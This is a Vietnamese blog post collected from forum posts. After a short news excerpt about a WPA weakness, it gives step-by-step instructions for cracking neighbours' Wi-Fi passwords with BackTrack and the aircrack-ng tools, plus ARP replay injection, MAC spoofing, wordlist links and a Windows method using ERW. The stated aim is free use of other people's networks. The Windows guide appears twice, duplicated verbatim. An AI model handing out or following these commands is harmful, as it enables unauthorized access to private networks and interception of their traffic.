Thông qua cách làm này, kẻ tấn công có thể đọc lưu lượng được mã hóa gửi đi giữa các máy tính và các bộ định tuyến (router) sử dụng hệ thống mã hóa WPA (truy cập Wi-Fi được bảo vệ). Hai nhà khoa học dự kiến sẽ thảo luận chi tiết hơn về cách thức bẻ khóa này tại hội thảo công nghệ diễn ra vào ngày 25/9 tới tại Hiroshima.
Tháng 11 năm ngoái, các nhà nghiên cứu bảo mật đã trình diễn cách thức bẻ khóa WPA và phải mất từ 12-15 phút. Khi đó, kỹ thuật bẻ khóa được thực hiện trên các hệ thống WPA sử dụng thuật toán Temporal Key Integrity Protocol (TKIP) và không thể áp dụng đối với các thiết bị WPA 2 mới hơn hoặc sử dụng thuật toán mã hóa Advanced Encryption Standard (AES) cấp cao hơn. Còn lần này, các nhà nghiên cứu Nhật Bản đưa ra cách bẻ khóa ở mức mới cao hơn, phạm vi rộng hơn và chỉ mất có 60 giây.
Các bộ định tuyến sử dụng hệ thống bảo mật đã gặp nhiều vấn đề bảo mật trong thời gian qua như hệ thống Wired Equivalent Privacy (WEP) được giới thiệu năm 1997 và bị bẻ khóa chỉ vài năm sau đó. Do đó, lần bẻ khóa này của các chuyên gia bảo mật Nhật Bản đã một lần nữa đánh lên hồi chuông cảnh báo độ bảo mật trên các bộ định tuyến Wi-Fi.
Theo VnMedia (PC World)
"BACKTRACK" CÔNG CỤ HACK WIFI HÀNG ĐẦU THẾ GIỚI
DÙNG CHO MỌI HỆ ĐIỀU HÀNH
bước 1 downnload BACKTRACK 4 beta
KHI DOWN FILE ISO VỀ BURN RA ĐĨA VÀ BOOT --> MÌNH DÙNG LIVE CD
http://www.backtrack-linux.org/downloads/
bước 2 download tài liệu về --> dành cho những bạn thích hiểi rõ về cấu trúc của nó
mediafire
CÁI NÀY MÌNH LIỆT KÊ RA CHO NHỮNG BẠN LƯỜI ĐỌC MÀ CHỈ THIX HACK LIỀN
LƯU Ý KHI DÙNG BACKTRACT THEO TÀI LIỆU
1.BT 4 beta
2.để tự động boot không chỉnh bất cứ dòng nào
3.login:root
4.pass:toor
5.mở bảng conshole:có 1 ô màu đen bé xíu kế bên startmenu
CÁC BẠN LÀM THEO DÒNG LỆNH SAU
1.iwconfig-->xem tên card mình đang dùng
mình dùng card interface là wlan0 nên---> nên xem tài liêu ở trên để hiễu rõ hơn
2.airmon-ng
3.airmon-ng stop wlan0
4.airmon-ng start wlan0
5.airodump-ng --ivs --write capturefile wlan0
6.airodump-ng --ivs --channel {ap channel} --bssid {ap bssid} --write capturefile wlan0
7.aireplay-ng --arpreplay -b {ap bssid} -h {client MAC from airodump} wlan0
8.aircrack-ng -b {ap bssid}
thế là đã có wep key --> mình khuyên các bạn nên đọc tài liệu trên để hiể hơn (100% thành công)
lượng DATA tối thiểu nên chờ là 40 000 nha các bạn
CHANGE mac NẾU CẦN THIẾT
change mac) thực hiện theo các lệnh sau
-(...) tên interface như WLAN0 chẳng hạn
airmon-ng
airmon-ng stop ...
iconfig ... down
macchanger --mac 00:11:22:33:44:55 ...
airmon-ng start ...
và khi đã monitor , thì bạn tiếp tục thưc hiện các lệnh kế , và bây giờ bạn ko cần quan tâm station cũa người ta (khi đến lệnh nào mầ phải điền station thì bạn điền 00:11 ..etc
have fun
bác nào khi chạy iwconfig ko có thông tin card wifi của mình thì nên vào:
những hardware chạy dc trên BT4
những hardware hông hỗ trợ trên BT4
vô đó search theo loại card mà mình sử dụng, ko cần phải đăng kí để search
ĐÂY LÀ ĐOẠN CLIP MANG TÍNH THAM KHẢO VÀ CÓ THỂ KHÁC TÀI LIỆU (ko đáng kể ^^!)
+nê1u ai ko hiểu bước nào cứ nhắn vào ,mình sẽ chỉ đến khi lấy được key thôi , (và mình sẽ ko chịu trách nhiệm khi các bạn được police mời đi uống trà đá )
1 VÀI DICTIONARY CHO NHỮNG AI HACK WPA & WPA2
Code:
http://websecurity.ro/downloads/dictionary.tar.gzCode:
http://upload.gibbocool.com/files/28GBwordlist.rarCode:
http://rapidshare.com/files/98295454/huge_wordlist.rarlưu ý : các dictionary ở trên khi extract ra sẽ có dung lượng vài chục GB ,nên hãy xem xét trườc khi down
còn đây là trang web chứa dictonary ,ai thĩ thì vào tìm hiểu,có luôn các tool để làm wordlist. Nhưng tạo wordlist thường thường tử 3-8 ký tự alphanumeric không cũng đã vài GB rồi
Code:
http://packetstormsecurity.org/Crackers/wordlists/utilitiesTHAM KHẢO TẠI : NHỚ THANKS MÌNH NHÁ , ^^!
NOTE---WPA,WPA2
Hi,
Tôi hay lang thang thấy các diễn đàn có nhiều người hỏi về crack passwork wirless để xài chùa, và có rất nhiều bài hướng dẫn làm điều đó, chủ yếu dùng aircrack trên *nix và Abel & Cain trên Windows hoặc BACKTRACK. Bản thân thôi chỉ mới thử dùng aircrack trên Ubuntu để thử dò cái pass của nhà bên cạnh và lên cơ quan dò thử (cả 2 đều dùng WPA). Kết quả đều là con số 0. Sau đó tôi nhận ra rằng để dò được pass thì trong dictionary phải có cái pass đó thì mới có cơ may. Mà ở VN thường có kiểu đặt pass theo kiểu nói trại đi, biến từ biến ngữ, ví dụ như là :
- kute, cut3, kut3 (cute)
- 9girls, nic3girls (nice girls)
- d0g (dog)
- ...
Với kiểu nói và viết như vậy và khi đặt pass cũng đặt như vậy thì tôi dám khẳng định việc crack pass WPA là không thể. Tôi đã từng thử với bộ từ điển search được trên mạng có size là 10 Mb (file text mà 10 Mb thì thử hình dung nó chứa bao nhiêu từ ) mà cũng không dò được pass. Bên cạnh đó với kiểu đặt theo strong password có chữ số, ký tự đặc biệt, vd :
- emkut3@^_^
- |-|3L0 |-|@c|<3r (Hello hacker)
- ..
Thì tôi dám chắc chắn việc crack password WPA là chuyện viễn vông nếu mong muốn ra ngay kết quả ! Hoặc phải có 1 nhóm tập trung các passwork "made in VN" thì mới đáp ứng được.
Vậy các bạn vui lòng cho biết, trong các bạn ai đã từng crack được pass wireless WPA và pass là gì ?
Hy vọng bài viết này sẽ dập tắt được mơ tưởng về việc crack pass wireless WPA của đa số người khi xem các bài tut, các video demo việc crack thấy ngon lành lắm, nhưng không để ý là đã số pass trong các bài tut đó đều rất đơn giản như là 123456, 123456789...
Thân
---------------------------------------------------------------------------------------------
NHỮNG BÀI ĐƯỢC LƯU Ý
nggianglx 
namquang1233 nggianglx nggianglx namquang1233 namquang1233 Vậy mình hướng dẩn cách crack trên winxp bằng erw 2.7
đầu tiên các bạn down driver,erw 2.7.1,aircrack-ng-1.0-rc3-win giải nén ra hết
bước 1:cài driver cho card wireless
vào device manager/network adater/tên card wireless trên máy,update driver chọn hàng dưới cho tới khi có nút have disk bấm vào chọn đến folder driver vừa giải nén,nếu card thích hợp thì chỉ có 1 hoặc 2 tên hiện ra nếu ko thì nó sẽ hiện hết toàn bộ card trong driver đó,khi đó bạn thử từng cái xem cái nào chạy được,nếu driver cài được thì trước tên card phải có chữ commview,khi cài driver xong thì card wireless vẫn hoạt động bình thường như driver gốc.
bước 2:chạy ct erw
a.bấm monitor (nếu driver cài đúng thì nó sẽ tự động thu xuống thanh taskbar nếu ko thì nó sẽ thoát ra)
b.bấm auto-scan,nó sẽ hiện những mạng xung quanh,double-click vào tên mạng muốn hack.Nếu cpu yếu,ko có máy station nếu WPA hoặc sóng yếu thì nó sẽ khó hiện lên,bạn cho auto-scan vài lần,nếu ko hiện thì bạn phải đánh bằng tay những thông số bên trái :
kế nút del,file,ssid ap thì đánh tên ssid (tên trong ct scan của win)
ch
channel của mạng cần hack)
mac ap:MAC của ap cần hack
mac sta:MAC của client(cần khi hack WPA còn WEP thì khỏi)
mac falsa:MAC của card mạng đang monitor(nếu ko biết bạn chạy ct mac address changer trong folder erw(nếu AP bị khóa MAC thì dùng ct này để đổi MAC)
encriptacion:khóa mà ap đang xử dụng(WEP,WPA,WPA2)
c.1 hack WEP: bấm MODO AUTOMATICO rồi chờ data tăng lên.
2 hack WPA:bấm CAPTURA DE PAQUETES
chờ khi có máy client thì đánh MAC vào MAC STA nếu ko thì tắt thử lúc khác(bắt buộc phải có máy client mới có thể làm được)
khi có máy client thì xem data nếu nó lên liên tục thì bấm A0-AP/STA (tốt nhất là chờ nó close hết các cửa sổ mới hiện lên khoảng 30s bấm lại lần nữa làm 3 lần)xem cửa sổ CAPTURA DE PAQUETES hàng trên hết hiện lên WPA handshake: MAC AP là xong.Nếu máy client xài Win vista thì khi bấm A0-AP/STA data sẽ đứng ngay khi đó thoát hết cửa sổ CAPTURA DE PAQUETES rồi bấm lại xem nó có mất máy client,nếu mất thì bạn để nguyên chờ đến khi máy client hiện lên lại là có WPA handshake (nếu sóng đủ mạnh)mình đã thử máy nhà khi xài Win vista sp2 (sp1 trở về trước chưa thử)khi bấm A0-AP/STA là card wireless bị treo ko thấy bất cứ mạng nào phải restart máy mới trở lại bình thường winxp thì ko bị.
bước 3:dò key
mở ct aircrack-ng gui trong folder aircrack-ng-1.0-rc3-win\bin
phần filename nhấn choose chọn file đã lưu bằng ct erw (thường tên file có kèm theo số phía sau vì mỗi lần bạn bấm CAPTURA DE PAQUETE hoặc MODO AUTOMATICO thì nó sẽ tạo 1 file mới nên tốt nhất trước khi bấm nên xóa hết những file trước đó để khỏi bị rối,flie có đuôi .cap)
dò key wep thì để nguyên bấm lauch
dò key wpa thì chọn wpa phần wordlist thì chọn file có tự điển xong bấm lauch
trong file passview+dic có sẵn ct passwordspro dùng để tạo td hoặc password,mở ct lên bấm F8 tạo td chọn tạo số hoặc kí tự độ dài chọn xong bấm F5 để ct tự tạo td(nhớ xem dung lượng trước khi bấm F5 và phải ít nhất là 8 kí tự trở lên vì pass WPA thấp nhất là 8 kí tự) và một số td có những pass thông dụng tiếng anh bạn có dùng những td đó trước nếu ko có thì mới tạo td bắng passwordpro,mình cũng dò được key trong đám td đó.
khi dò pass bằng td nó nên để ý nhiệt độ cpu nếu nó nóng quá nên tìm cánh khắc phục trước khi dò bởi nếu dò nửa chừng máy bị treo thì phải làm lại từ đầu.
đầu tiên các bạn down driver,erw 2.7.1,aircrack-ng-1.0-rc3-win giải nén ra hết
bước 1:cài driver cho card wireless
vào device manager/network adater/tên card wireless trên máy,update driver chọn hàng dưới cho tới khi có nút have disk bấm vào chọn đến folder driver vừa giải nén,nếu card thích hợp thì chỉ có 1 hoặc 2 tên hiện ra nếu ko thì nó sẽ hiện hết toàn bộ card trong driver đó,khi đó bạn thử từng cái xem cái nào chạy được,nếu driver cài được thì trước tên card phải có chữ commview,khi cài driver xong thì card wireless vẫn hoạt động bình thường như driver gốc.
bước 2:chạy ct erw
a.bấm monitor (nếu driver cài đúng thì nó sẽ tự động thu xuống thanh taskbar nếu ko thì nó sẽ thoát ra)
b.bấm auto-scan,nó sẽ hiện những mạng xung quanh,double-click vào tên mạng muốn hack.Nếu cpu yếu,ko có máy station nếu WPA hoặc sóng yếu thì nó sẽ khó hiện lên,bạn cho auto-scan vài lần,nếu ko hiện thì bạn phải đánh bằng tay những thông số bên trái :
kế nút del,file,ssid ap thì đánh tên ssid (tên trong ct scan của win)
ch
channel của mạng cần hack)mac ap:MAC của ap cần hack
mac sta:MAC của client(cần khi hack WPA còn WEP thì khỏi)
mac falsa:MAC của card mạng đang monitor(nếu ko biết bạn chạy ct mac address changer trong folder erw(nếu AP bị khóa MAC thì dùng ct này để đổi MAC)
encriptacion:khóa mà ap đang xử dụng(WEP,WPA,WPA2)
c.1 hack WEP: bấm MODO AUTOMATICO rồi chờ data tăng lên.
2 hack WPA:bấm CAPTURA DE PAQUETES
chờ khi có máy client thì đánh MAC vào MAC STA nếu ko thì tắt thử lúc khác(bắt buộc phải có máy client mới có thể làm được)
khi có máy client thì xem data nếu nó lên liên tục thì bấm A0-AP/STA (tốt nhất là chờ nó close hết các cửa sổ mới hiện lên khoảng 30s bấm lại lần nữa làm 3 lần)xem cửa sổ CAPTURA DE PAQUETES hàng trên hết hiện lên WPA handshake: MAC AP là xong.Nếu máy client xài Win vista thì khi bấm A0-AP/STA data sẽ đứng ngay khi đó thoát hết cửa sổ CAPTURA DE PAQUETES rồi bấm lại xem nó có mất máy client,nếu mất thì bạn để nguyên chờ đến khi máy client hiện lên lại là có WPA handshake (nếu sóng đủ mạnh)mình đã thử máy nhà khi xài Win vista sp2 (sp1 trở về trước chưa thử)khi bấm A0-AP/STA là card wireless bị treo ko thấy bất cứ mạng nào phải restart máy mới trở lại bình thường winxp thì ko bị.
bước 3:dò key
mở ct aircrack-ng gui trong folder aircrack-ng-1.0-rc3-win\bin
phần filename nhấn choose chọn file đã lưu bằng ct erw (thường tên file có kèm theo số phía sau vì mỗi lần bạn bấm CAPTURA DE PAQUETE hoặc MODO AUTOMATICO thì nó sẽ tạo 1 file mới nên tốt nhất trước khi bấm nên xóa hết những file trước đó để khỏi bị rối,flie có đuôi .cap)
dò key wep thì để nguyên bấm lauch
dò key wpa thì chọn wpa phần wordlist thì chọn file có tự điển xong bấm lauch
trong file passview+dic có sẵn ct passwordspro dùng để tạo td hoặc password,mở ct lên bấm F8 tạo td chọn tạo số hoặc kí tự độ dài chọn xong bấm F5 để ct tự tạo td(nhớ xem dung lượng trước khi bấm F5 và phải ít nhất là 8 kí tự trở lên vì pass WPA thấp nhất là 8 kí tự) và một số td có những pass thông dụng tiếng anh bạn có dùng những td đó trước nếu ko có thì mới tạo td bắng passwordpro,mình cũng dò được key trong đám td đó.
khi dò pass bằng td nó nên để ý nhiệt độ cpu nếu nó nóng quá nên tìm cánh khắc phục trước khi dò bởi nếu dò nửa chừng máy bị treo thì phải làm lại từ đầu.
hoasimtim.hm 1, download ban BT4 beta ve ghi ra dia....
2, ban download them chuong trinh Network Stumbler hoặc Cain ve de do MAC va kenh cua wifi can crack(Vi khi vao BT4 toi go lenh aimo-ng wlan0 thi ko chay dc->ko do dc MAC va Kenh)
3,ban khoi dong lai may....cho dia BT4 beta vao va an F12...bam Enter thi phai......
cho cho no chay xong ... go lenh startx vao
luc nay no se hien len cua so chinh cua BT4 co giao dien nhu ban xem video huong dan luon...cung kha giong giao dien cua win do....
4, ban go lenh airmon-ng roi bam enter
de bit dc cac wifi minh duong...thuong la wlan0 ,neu ban dung 1 cac wifi
5, ban go tiep lenh airodump-ng -w wep -c (kenh) --bssid (Mac) wlan0 bam enter
Vidu: airodump-ng -w wep -c 11 --bssid 00:1a:2b:2b:45:10 wlan0
luc nay cac thong so bat dau chay nhung co the con cham...nhat la data co the tang rat cham
6, Ban go tiep lenh aireplay-ng -10 -a (Mac) wlan0
vi du: aireplay-ng -10 -a 00:1a:2b:2b:45:10 wlan0
7, ban go tiep lenh aireplay-ng -3 -b (mac) wlan0
luc naycac goi packets bat dau gui di...luong data bat dau tang nhanh....nhung cung co the ban phai cho khoang 10 den 15 phut thi khi do data tang moi nhanh..toi da phai thu di thu lai rat nhieu lan
8.Ban cho cho luong data len khoang tren 30 000 hoac 40 000 hoac lon hon (luc nay data co the dat den con so nay thi no phai chay cung nhanh roi...chu ko tang cham nhu luc dau nua)
Tiep theo ban go lenh dir thi no se hien ra ten five ma minh da luu cac du lieu gui va nhan packets co dang wep-01.cap hoac wep-02.cap....
9 ban go tiep lenh aircrack-ng -wep-01.cap (tuy theo ten thu duoc ma lenh tren ban go)
luc nay la ket qua.. key fond se hien ra...va do la pass ma minh can tim....
Chu y: 1. ban phai go dung lenh tung khoang trong, dau cach"-" ,neu ko thi no se ko chay ....luc dau toi cung da go sai nhieu lan....
2. Toi dung lap top HP...cac mang wifi cua toi la loai boocam thi phai....va cung da dung usb Wifi dlink534 cung co ho tro de crack...ngoai ra toi da thu dung voi 2may khac la loai asus cua 2 thang ban thi nhu hinh ko ho tro thi phai...go lenh vao ma no ko chay cac thong so....
Share This Post
Blog RSS Feed
Subscribe via E-mail
Follow Me on Twitter
0 nhận xét to “HACK WIFI - Backtrack - Sưu tầm”